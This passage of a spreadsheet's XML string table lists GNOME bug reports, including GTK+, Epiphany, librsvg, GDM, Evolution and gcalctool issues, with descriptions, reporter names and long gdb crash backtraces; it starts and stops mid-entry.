Checked g_free at goffice/graph/gog-reg-curve.c:153
Checked g_free at goffice/graph/gog-reg-curve.c:157
Checked g_free at goffice/graph/gog-smoothed-curve.c:52
Checked g_free at goffice/graph/gog-smoothed-curve.c:54
Checked g_free at goffice/utils/go-image.c:411
Checked g_free at goffice/utils/go-image.c:430
Checked g_free at goffice/utils/go-image.c:471
Checked g_free at goffice/utils/go-regression.c:1143
Checked g_free at goffice/utils/go-regression.c:1145
Checked g_free at goffice/utils/go-regression.c:1147
Checked g_free at plugins/plot_barcol/gog-line.c:139
Checked g_free at plugins/plot_barcol/gog-line.c:168
Checked g_free at plugins/plot_boxes/gog-boxplot.c:221
Checked g_free at plugins/plot_boxes/gog-histogram.c:88
Checked g_free at plugins/plot_boxes/gog-histogram.c:113
Checked g_free at plugins/plot_boxes/gog-histogram.c:475
Checked g_free at plugins/plot_boxes/gog-histogram.c:479
Checked g_free at plugins/plot_surface/gog-surface.c:418
Checked g_free at plugins/plot_surface/xl-surface.c:180
Checked g_free at plugins/plot_surface/xl-surface.c:237
Checked g_free at plugins/reg_linear/gog-lin-reg.c:78
Checked g_free at plugins/reg_linear/gog-lin-reg.c:119
Checked g_free at plugins/reg_linear/gog-lin-reg.c:122
Checked g_free at plugins/reg_linear/gog-lin-reg.c:214
Checked g_free at plugins/reg_linear/gog-lin-reg.c:238
Checked g_free at plugins/reg_linear/gog-lin-reg.c:242
Checked g_free at plugins/reg_linear/gog-log-reg.c:40
Checked g_free at plugins/reg_linear/gog-log-reg.c:43
Checked g_free at plugins/reg_linear/gog-polynom-reg.c:50
Checked g_free at plugins/reg_linear/gog-polynom-reg.c:54
Checked g_free at plugins/reg_logfit/gog-logfit.c:84
Checked g_free at plugins/smoothing/gog-exp-smooth.c:105
Checked g_free at plugins/smoothing/gog-exp-smooth.c:109
Checked g_free at plugins/smoothing/gog-moving-avg.c:135
Checked g_free at plugins/smoothing/gog-moving-avg.c:139</t>
  </si>
  <si>
    <t>GTK+-152744</t>
  </si>
  <si>
    <t>Menu closes itself when too many windows are opened</t>
  </si>
  <si>
    <t>When I opened many files at once I was unable to use the menu to act on my
images. When I clicked on it it disappeared before I was able to do anything
repeatedly.
However this was not for all the windows some worked correctly. And when I
closed some other worked correctly then.</t>
  </si>
  <si>
    <t>gottferdom</t>
  </si>
  <si>
    <t>JHBUILD-461710</t>
  </si>
  <si>
    <t>Do not set GNOME_ACCESSIBILITY environment variable.</t>
  </si>
  <si>
    <t>This bug is based on bug 435325#8 in which Li Yuan (atk developer) states:
&gt; Why GNOME_ACCESSIBILITY is automatically turned on by jhbuild? If
&gt; it want to start applications with A11Y support the official way
&gt; is to set gconf key. GNOME_ACCESSIBILITY should only be turned on by
&gt; A11Y developers who want to see these messages.
So I think jhbuild should not set GNOME_ACCESSIBILITY=1.</t>
  </si>
  <si>
    <t>EPIPHANY-348350</t>
  </si>
  <si>
    <t>Switch to Tango-style icons and Icon Naming Standard named icons</t>
  </si>
  <si>
    <t>Please describe the problem:
This is a placeholder theme about new style for Epiphany icons. I'll put here all info or pixmap we could need to make Epiphany a Tango-ided application.
We have to:
  1. use named icons following Icon Naming Standard both for icons yet available in gnome-icon-theme and for custom epiphany icons
  2. draw custom epiphany icons using Tango guidelines.
Steps to reproduce:
1. Choose Tango or the new GNOME icon theme in Theme preferences tool
2. Start Epiphany
3. Select View-&gt;Toolbars-&gt;Customize
Actual results:
Old sytle icons are mixed with new ones :-)
Expected results:
All icons should follow the Tango guidelines (now GNOME guidelines too)
Does this happen every time?
Yes of course
Other information:
In the next days I'll spend some time searching in Epiphany sources for icon names trying to identify icons we could fetch directly from Icon Naming Standard and custom icons we need to provide with epiphany.
Of course I'll add jimmac to this bug :-)</t>
  </si>
  <si>
    <t>GIMP-487153</t>
  </si>
  <si>
    <t>File is missing from POTFILES.in</t>
  </si>
  <si>
    <t>http://l10n.gnome.org/module/gimp says:
There are some missing files from POTFILES.in:
    * app/widgets/gimpcolorselectorpalette.c
Please add this file to the appropriate POTFILES.in and all the other POTFILES.skip files.</t>
  </si>
  <si>
    <t>GDK-PIXBUF-54933</t>
  </si>
  <si>
    <t>gdk-pixbuf-features.h has wrong version</t>
  </si>
  <si>
    <t>gdk-pixbuf-features.h still has the version of gdk-pixbuf equal to 0.8.0.
Needs to be autogenerated so it's correct.</t>
  </si>
  <si>
    <t>GNOMEMM-107686</t>
  </si>
  <si>
    <t>CanvasAA destructor (mem dealloc) bug</t>
  </si>
  <si>
    <t>as opposed to the destructor of Gnome::Canvas::Canvas which works fine
there seems to be a mem or destructor problem with the Gnome::Canvas::CanvasAA
just take the standard example file from gtkmm:
gnomemm-all-1.3.15/libgnomecanvasmm/examples/canvas/canvas.cc
and modify line 8
class CanvasExample : public Gnome::Canvas::CanvasAA
instead of class CanvasExample : public Gnome::Canvas::Canvas
then the program executes fine wit an AA canvas. however when closing the
program the following errors appear:
$ ./canvas
(canvas:27026): GLib-GObject-WARNING **: instance of invalid non-instantiatable
type `'
(canvas:27026): GLib-GObject-CRITICAL **: file gsignal.c: line 2490
(g_signal_emit_valist): assertion `G_TYPE_CHECK_INSTANCE (instance)' failed
(canvas:27026): GLib-GObject-CRITICAL **: file gobject.c: line 1337
(g_object_unref): assertion `G_IS_OBJECT (object)' failed
i detected this error on another program (the gtkmm canvas example is just
for illustration)
and since that program worked without err in c i suppose there is a
destructor error in the CanvasAA wrapper
in my original program closing the program (which executes and displays
fine even with CanvasAA) gives the following error:
(gaga:20503): GnomeCanvas-CRITICAL **: file gnome-canvas.c: line 3721
(gnome_canvas_request_redraw): assertion `GNOME_IS_CANVAS (canvas)' failed
this error message is repeated for each Canvas::Item that was displayed
before closing the program
just as the gnomemm-all-1.3.15/libgnomecanvasmm/examples/canvas/canvas.cc
file replacing Gnome::Canvas with Gnome::CanvasAA leads to a working
program that displays perfectly
but with CanvasAA there are errors when the program is closed
conclusion: destructor problem in the Gnome::CanvasAA wrapper</t>
  </si>
  <si>
    <t>barbapapa</t>
  </si>
  <si>
    <t>LIBRSVG-329472</t>
  </si>
  <si>
    <t>GNOME Panel crashes whem loading /usr/share/openclipart/svg/computer/icons/</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Ubuntu 5.10 (breezy)
Package: gnome-panel
Severity: critical
Version: GNOME2.12.1 2.12.x
Gnome-Distributor: Ubuntu
Synopsis: GNOME Panel crashes whem loading /usr/share/openclipart/svg/computer/icons/
Bugzilla-Product: gnome-panel
Bugzilla-Component: Panel
Bugzilla-Version: 2.12.x
BugBuddy-GnomeVersion: 2.0 (2.12.0)
Description:
Description of the crash:
When I try to open that directory to choose on of the icons for an
application laying on the panel gnome-panel crashes.
Steps to reproduce the crash:
1. Edit icon preferences
2. Change Icon
3. Load a directory with too much icons on it? SVG rendering problems?
Expected Results:
The icons present on the directory should show up and it should be
possible to choose from them.
How often does this happen?
Always
Additional Information:
Debugging Information:
Backtrace was generated from '/usr/bin/gnome-panel'
(no debugging symbols found)
Using host libthread_db library /lib/tls/i686/cmov/libthread_db.so.1.
(no debugging symbols found)
`system-supplied DSO at 0xffffe000' has disappeared keeping its
symbols.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1224272192 (LWP 10208)]
[New Thread -1247933520 (LWP 23368)]
[New Thread -1232032848 (LWP 23319)]
[New Thread -1226515536 (LWP 10245)]
(no debugging symbols found)
0xffffe410 in __kernel_vsyscall ()
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb76b84ab in __waitpid_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
#2  0xb7e96508 in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
#3  
#4  0xb69b682d in rsvg_new_defs () from /usr/lib/librsvg-2.so.2
#5  0xb69b59a5 in rsvg_node_draw () from /usr/lib/librsvg-2.so.2
#6  0xb69b5a31 in _rsvg_node_draw_children () from
/usr/lib/librsvg-2.so.2
#7  0xb69b59a5 in rsvg_node_draw () from /usr/lib/librsvg-2.so.2
#8  0xb69b5a31 in _rsvg_node_draw_children () from
/usr/lib/librsvg-2.so.2
#9  0xb69b59a5 in rsvg_node_draw () from /usr/lib/librsvg-2.so.2
#10 0xb69b5fb2 in rsvg_node_group_pack () from /usr/lib/librsvg-2.so.2
#11 0xb69b59a5 in rsvg_node_draw () from /usr/lib/librsvg-2.so.2
#12 0xb69bdc96 in rsvg_handle_get_pixbuf () from
/usr/lib/librsvg-2.so.2
#13 0xb7eecbf2 in ?? () from
/usr/lib/gtk-2.0/2.4.0/loaders/svg_loader.so
#14 0x096d5eb0 in ?? ()
#15 0x00000000 in ?? ()
#16 0xbfb09638 in ?? ()
#17 0xb7eecb25 in ?? () from
/usr/lib/gtk-2.0/2.4.0/loaders/svg_loader.so
#18 0x00000000 in ?? ()
#19 0xbfb09668 in ?? ()
#20 0x00000d66 in ?? ()
#21 0x00000000 in ?? ()
#22 0xbfb09668 in ?? ()
#23 0x00001000 in ?? ()
#24 0xb70716c0 in ?? ()
#25 0xb78a34c0 in ?? () from /usr/lib/libgdk_pixbuf-2.0.so.0
#26 0x0926bbd0 in ?? ()
#27 0x096ee198 in ?? ()
#28 0xbfb0a678 in ?? ()
#29 0xb7895931 in _gdk_pixbuf_generic_image_load ()
   from /usr/lib/libgdk_pixbuf-2.0.so.0
#30 0xb7895931 in _gdk_pixbuf_generic_image_load ()
   from /usr/lib/libgdk_pixbuf-2.0.so.0
#31 0xb7895ac4 in gdk_pixbuf_new_from_file ()
   from /usr/lib/libgdk_pixbuf-2.0.so.0
#32 0xb7ea61a5 in gnome_icon_selection_add_defaults ()
   from /usr/lib/libgnomeui-2.so.0
#33 0xb7ea6716 in gnome_icon_selection_add_directory ()
   from /usr/lib/libgnomeui-2.so.0
#34 0xb76e6750 in g_child_watch_add () from /usr/lib/libglib-2.0.so.0
#35 0xb76e44ee in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#36 0xb76e74f6 in g_main_context_check () from
/usr/lib/libglib-2.0.so.0
#37 0xb76e77e3 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#38 0xb7ea6b3c in gnome_icon_selection_show_icons ()
   from /usr/lib/libgnomeui-2.so.0
#39 0xb7e97539 in gnome_icon_entry_get_type () from
/usr/lib/libgnomeui-2.so.0
#40 0xb7755ab3 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#41 0xb774a3a8 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#42 0xb7758b13 in g_signal_stop_emission () from
/usr/lib/libgobject-2.0.so.0
#43 0xb77598a1 in g_signal_emitv () from /usr/lib/libgobject-2.0.so.0
#44 0xb7998de5 in gtk_bin_get_child () from
/usr/lib/libgtk-x11-2.0.so.0
#45 0xb7999db9 in gtk_binding_set_by_class ()
   from /usr/lib/libgtk-x11-2.0.so.0
#46 0xb799a029 in gtk_binding_set_by_class ()
   from /usr/lib/libgtk-x11-2.0.so.0
#47 0xb799a227 in gtk_bindings_activate_event ()
   from /usr/lib/libgtk-x11-2.0.so.0
#48 0xb7b3ffb1 in gtk_widget_activate () from
/usr/lib/libgtk-x11-2.0.so.0
#49 0xb79f4374 in gtk_entry_set_visibility ()
   from /usr/lib/libgtk-x11-2.0.so.0
#50 0xb7a5e02c in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
#51 0xb7749d75 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#52 0xb774a3a8 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#53 0xb7758c9f in g_signal_stop_emission () from
/usr/lib/libgobject-2.0.so.0
#54 0xb7759ec3 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#55 0xb775a4c3 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#56 0xb7b4016f in gtk_widget_activate () from
/usr/lib/libgtk-x11-2.0.so.0
#57 0xb7b4f7e1 in gtk_window_propagate_key_event ()
   from /usr/lib/libgtk-x11-2.0.so.0
#58 0xb7b53af5 in gtk_window_activate_key () from
/usr/lib/libgtk-x11-2.0.so.0
#59 0xb7a5e02c in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
#60 0xb7749d75 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#61 0xb774a3a8 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#62 0xb7758c9f in g_signal_stop_emission () from
/usr/lib/libgobject-2.0.so.0
#63 0xb7759ec3 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#64 0xb775a4c3 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#65 0xb7b4016f in gtk_widget_activate () from
/usr/lib/libgtk-x11-2.0.so.0
#66 0xb7a5c879 in gtk_propagate_event () from
/usr/lib/libgtk-x11-2.0.so.0
#67 0xb7a5cba0 in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
#68 0xb7900b2d in _gdk_events_queue () from
/usr/lib/libgdk-x11-2.0.so.0
#69 0xb76e44ee in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#70 0xb76e74f6 in g_main_context_check () from
/usr/lib/libglib-2.0.so.0
#71 0xb76e77e3 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#72 0xb7a5be65 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#73 0x080655f7 in main ()
Thread 4 (Thread -1226515536 (LWP 10245)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb763e0f4 in poll () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb76e7348 in g_main_context_check () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0xb76e77e3 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb7c4c37e in link_thread_io_context () from
/usr/lib/libORBit-2.so.0
No symbol table info available.
#5  0xb77008c4 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#6  0xb76b2361 in start_thread () from
/lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#7  0xb7647bde in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 3 (Thread -1232032848 (LWP 23319)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb76b4c96 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb7d3992b in _gnome_vfs_thread_pool_init ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#3  0xb77008c4 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb76b2361 in start_thread () from
/lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0xb7647bde in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 2 (Thread -1247933520 (LWP 23368)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb76b4c96 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb7d3992b in _gnome_vfs_thread_pool_init ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#3  0xb77008c4 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb76b2361 in start_thread () from
/lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0xb7647bde in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 1 (Thread -1224272192 (LWP 10208)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb76b84ab in __waitpid_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb7e96508 in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#3  
No symbol table info available.
#4  0xb69b682d in rsvg_new_defs () from /usr/lib/librsvg-2.so.2
No symbol table info available.
#5  0xb69b59a5 in rsvg_node_draw () from /usr/lib/librsvg-2.so.2
No symbol table info available.
#6  0xb69b5a31 in _rsvg_node_draw_children () from
/usr/lib/librsvg-2.so.2
No symbol table info available.
#7  0xb69b59a5 in rsvg_node_draw () from /usr/lib/librsvg-2.so.2
No symbol table info available.
#8  0xb69b5a31 in _rsvg_node_draw_children () from
/usr/lib/librsvg-2.so.2
No symbol table info available.
#9  0xb69b59a5 in rsvg_node_draw () from /usr/lib/librsvg-2.so.2
No symbol table info available.
#10 0xb69b5fb2 in rsvg_node_group_pack () from /usr/lib/librsvg-2.so.2
No symbol table info available.
#11 0xb69b59a5 in rsvg_node_draw () from /usr/lib/librsvg-2.so.2
No symbol table info available.
#12 0xb69bdc96 in rsvg_handle_get_pixbuf () from
/usr/lib/librsvg-2.so.2
No symbol table info available.
#13 0xb7eecbf2 in ?? () from
/usr/lib/gtk-2.0/2.4.0/loaders/svg_loader.so
No symbol table info available.
#14 0x096d5eb0 in ?? ()
No symbol table info available.
#15 0x00000000 in ?? ()
No symbol table info available.
#16 0xbfb09638 in ?? ()
No symbol table info available.
#17 0xb7eecb25 in ?? () from
/usr/lib/gtk-2.0/2.4.0/loaders/svg_loader.so
No symbol table info available.
#18 0x00000000 in ?? ()
No symbol table info available.
#19 0xbfb09668 in ?? ()
No symbol table info available.
#20 0x00000d66 in ?? ()
No symbol table info available.
#21 0x00000000 in ?? ()
No symbol table info available.
#22 0xbfb09668 in ?? ()
No symbol table info available.
#23 0x00001000 in ?? ()
No symbol table info available.
#24 0xb70716c0 in ?? ()
No symbol table info available.
#25 0xb78a34c0 in ?? () from /usr/lib/libgdk_pixbuf-2.0.so.0
No symbol table info available.
#26 0x0926bbd0 in ?? ()
No symbol table info available.
#27 0x096ee198 in ?? ()
No symbol table info available.
#28 0xbfb0a678 in ?? ()
No symbol table info available.
#29 0xb7895931 in _gdk_pixbuf_generic_image_load ()
   from /usr/lib/libgdk_pixbuf-2.0.so.0
No symbol table info available.
#30 0xb7895931 in _gdk_pixbuf_generic_image_load ()
   from /usr/lib/libgdk_pixbuf-2.0.so.0
No symbol table info available.
#31 0xb7895ac4 in gdk_pixbuf_new_from_file ()
   from /usr/lib/libgdk_pixbuf-2.0.so.0
No symbol table info available.
#32 0xb7ea61a5 in gnome_icon_selection_add_defaults ()
   from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#33 0xb7ea6716 in gnome_icon_selection_add_directory ()
   from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#34 0xb76e6750 in g_child_watch_add () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#35 0xb76e44ee in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#36 0xb76e74f6 in g_main_context_check () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#37 0xb76e77e3 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#38 0xb7ea6b3c in gnome_icon_selection_show_icons ()
   from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#39 0xb7e97539 in gnome_icon_entry_get_type () from
/usr/lib/libgnomeui-2.so.0
No symbol table info available.
#40 0xb7755ab3 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#41 0xb774a3a8 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#42 0xb7758b13 in g_signal_stop_emission () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#43 0xb77598a1 in g_signal_emitv () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#44 0xb7998de5 in gtk_bin_get_child () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#45 0xb7999db9 in gtk_binding_set_by_class ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#46 0xb799a029 in gtk_binding_set_by_class ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#47 0xb799a227 in gtk_bindings_activate_event ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#48 0xb7b3ffb1 in gtk_widget_activate () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#49 0xb79f4374 in gtk_entry_set_visibility ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#50 0xb7a5e02c in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#51 0xb7749d75 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#52 0xb774a3a8 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#53 0xb7758c9f in g_signal_stop_emission () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#54 0xb7759ec3 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#55 0xb775a4c3 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#56 0xb7b4016f in gtk_widget_activate () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#57 0xb7b4f7e1 in gtk_window_propagate_key_event ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#58 0xb7b53af5 in gtk_window_activate_key () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#59 0xb7a5e02c in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#60 0xb7749d75 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#61 0xb774a3a8 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#62 0xb7758c9f in g_signal_stop_emission () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#63 0xb7759ec3 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#64 0xb775a4c3 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#65 0xb7b4016f in gtk_widget_activate () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#66 0xb7a5c879 in gtk_propagate_event () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#67 0xb7a5cba0 in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#68 0xb7900b2d in _gdk_events_queue () from
/usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#69 0xb76e44ee in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#70 0xb76e74f6 in g_main_context_check () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#71 0xb76e77e3 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#72 0xb7a5be65 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#73 0x080655f7 in main ()
No symbol table info available.
#0  0xffffe410 in __kernel_vsyscall ()
------- Bug created by bug-buddy at 2006-02-01 15:10 -------
</t>
  </si>
  <si>
    <t>bsantos</t>
  </si>
  <si>
    <t>GTK+-79157</t>
  </si>
  <si>
    <t>Text clipped when using right-justified multiline label</t>
  </si>
  <si>
    <t>When using a label that's multiline and either right-justified or centered
the text is clipped at the right part.</t>
  </si>
  <si>
    <t>GTHUMB-502524</t>
  </si>
  <si>
    <t>Exclude hidden files/folders from Search</t>
  </si>
  <si>
    <t>At the moment searching includes hidden files and folders. There should be an option (set by default) to exclude them.
Example:
Other programs don't share the Nautilus thumbnail database and so insist on having  a separate thumbnail folder with the images. A search on filename in gThumb will pick up all these thumbnails along with the images I actually want.
Other information:</t>
  </si>
  <si>
    <t>ajj</t>
  </si>
  <si>
    <t>GDM-170811</t>
  </si>
  <si>
    <t>Action Menu  Shut Down The Computer</t>
  </si>
  <si>
    <t>Please describe the problem:
On the main graphical greeter screen pressing the Action button brings up the
menu without the Shut Down The Computer item
Steps to reproduce:
1. Press Action Button
2. 
3. 
Actual results:
Action menu appears containing two item:
Reboot the Computer
Configure login screen
Expected results:
to have the previous two items plus a third item:
Halt the Computer
Does this happen every time?
Yes
Other information:
I have just installed version 2.6.0.8
I found that line 136 of gdm.h read
#define GDM_KEY_HALT daemon/DefaultPath= HALT_COMMAND
when I changed this to 
#define GDM_KEY_HALT daemon/HaltCommand= HALT_COMMAND
and reinstalled gdm I found the menu contained the halt item</t>
  </si>
  <si>
    <t>clive.maclean</t>
  </si>
  <si>
    <t>DESKBAR-APPLET-518984</t>
  </si>
  <si>
    <t>crash in Deskbar: I've hitted several time...</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
I've hitted several times the reload button	
Distribution: Ubuntu 8.04 (hardy)
Gnome Release: 2.21.92 2008-02-26 (Ubuntu)
BugBuddy Version: 2.21.90
System: Linux 2.6.24-10-generic #1 SMP Fri Feb 22 19:08:18 UTC 2008 i686
X Vendor: The X.Org Foundation
X Vendor Release: 10400090
Selinux: No
Accessibility: Disabled
GTK+ Theme: Human
Icon Theme: Human
Memory status: size: 0 vsize: 0 resident: 0 share: 0 rss: 0 rss_rlim: 0
CPU usage: start_time: 0 rtime: 0 utime: 0 stime: 0 cutime:0 cstime: 0 timeout: 0 it_real_value: 0 frequency: 0
----------- .xsession-errors (101 sec old) ---------------------
/usr/lib/python2.5/site-packages/UpdateManager/UpdateManager.py:594: Warning: /build/buildd/glib2.0-2.15.6/gobject/gsignal.c:1741: instance `0x8acc000' has no handler with id `280'
  button.disconnect(id)
(gnome-panel:6203): GLib-CRITICAL **: g_array_free: assertion `array' failed
(gnome-panel:6203): GLib-CRITICAL **: g_array_free: assertion `array' failed
(gnome-panel:6203): GLib-CRITICAL **: g_array_free: assertion `array' failed
(gnome-panel:6203): GLib-CRITICAL **: g_array_free: assertion `array' failed
(gnome-panel:6203): GLib-CRITICAL **: g_array_free: assertion `array' failed
(gnome-panel:6203): GLib-CRITICAL **: g_array_free: assertion `array' failed
current dist not found in meta-release file
--------------------------------------------------
Traceback (most recent call last):
  File /usr/lib/python2.5/site-packages/deskbar/core/ModuleList.py line 143 in module_toggled_cb
    self[self.get_position_from_context(module)[0]][self.ENABLED_COL] = module.is_enabled()
TypeError: could not parse subscript as a tree path</t>
  </si>
  <si>
    <t>sanotto</t>
  </si>
  <si>
    <t>GRILO-685161</t>
  </si>
  <si>
    <t>GRILO</t>
  </si>
  <si>
    <t>grl_source_store() causes segfault if the plugin reports an error</t>
  </si>
  <si>
    <t>grl_source_store() causes segfault if the plugin reports an error.
see attached patch for proposed fix.</t>
  </si>
  <si>
    <t>grilo-maint</t>
  </si>
  <si>
    <t>GNOME-KEYRING-626439</t>
  </si>
  <si>
    <t>keyring files</t>
  </si>
  <si>
    <t>Evolution isn't able to store e-mail account passwords</t>
  </si>
  <si>
    <t>I have Evolution 2.30.2 on my linux PC with Mandriva 2010.1 spring and KDE 4.4.3 and there is extremely annoying problem. Everytime I run Evolution I'm asked for entering my email accounts password and after entering each password I'm prompted for entering ring-password or wallet password twice (I don't know exactly how its name is in English - I hope you will understand.). It happens everytime I lunch Evolution. It seems to me that Evolution has a problem to store entered email account passwords. I have four e-mail account thus it is extremely annoying. How to correct it?</t>
  </si>
  <si>
    <t>ondra.sk</t>
  </si>
  <si>
    <t>EVOLUTION_EXCHANGE-318595</t>
  </si>
  <si>
    <t>close evolution produces sometimes crash of evolution-exchage-storage</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Debian 3.1
Package: Evolution
Priority: Minor
Version: GNOME2.10.0 unspecified
Gnome-Distributor: Ubuntu
Synopsis: close evolution produces sometimes crash of evolution-exchage-storage
Bugzilla-Product: Evolution
Bugzilla-Component: Miscellaneous
Bugzilla-Version: unspecified
BugBuddy-GnomeVersion: 2.0 (2.10.0)
Description:
Description of the crash:
After closing evolution sometimes there pops up an failure message
telling me that evolution-exchange-storage died unexpectedly.
I have no idea what this could be. At least evolution seems to work
perfectly for me so this error can't be to serious. Perhaps a rather
cosmetic one. :)
Steps to reproduce the crash:
1. sometimes after closing evolution
2. 
3. 
Expected Results:
nothing dies unexpectedly
How often does this happen?
sometimes perhaps everytime I have it used longer time (half day or so
email and get mails and mark spam messages various times).
Additional Information:
I use spamassasin have a firewall installed (firestarter) but
localhost is given free so communication may not be the problem. I have
NIDS and IDS installed. I have gpilot-applet running maybe this has
something to do with evolution.
Well more ideas I don't have.
Email me back if you have an advice how I can test it further.
Debugging Information:
Backtrace was generated from '/usr/libexec/evolution-exchange-storage'
------- Bug moved to this database by unknown@gnome.bugs 2005-10-11 18:09 UTC -------
Bugreport moved from Evolution / Miscellaneous
  to Connector / Connector
The original reporter of this bug does not have
   an account here. Reassigning to the person who moved
   it here unknown@gnome.bugs.
   Previous reporter was evolutionbug@monoworks.com.
</t>
  </si>
  <si>
    <t>evolutionbug</t>
  </si>
  <si>
    <t>GNOME-CALCULATOR-131571</t>
  </si>
  <si>
    <t>Constants are saved/loaded in a locale-dependent way</t>
  </si>
  <si>
    <t>The calculator has some problems with its constants.
When first launched the constant pi has the value of pi times 10^10.
Probably gcalctool is confused by the current locale (de_DE we're using
the comma as decial separator here not the point).
The interpretation of the saved values seems to depend on the current mode
(SCI/FIX/ENG) of the calculator too. (Pretty confusing actually.)
Sometimes the fractional part and exponent of the constants gets cut off
(pi = 3 it was 3.1415E10 before).
AFAICT gcalctool should use a C locale when formatting/parsing its
constants for saving and loading.
Version: 4.3.35 (Debian Sid)</t>
  </si>
  <si>
    <t>sebastian_kapfer</t>
  </si>
  <si>
    <t>GTKHTML-229570</t>
  </si>
  <si>
    <t>cited tables look bad</t>
  </si>
  <si>
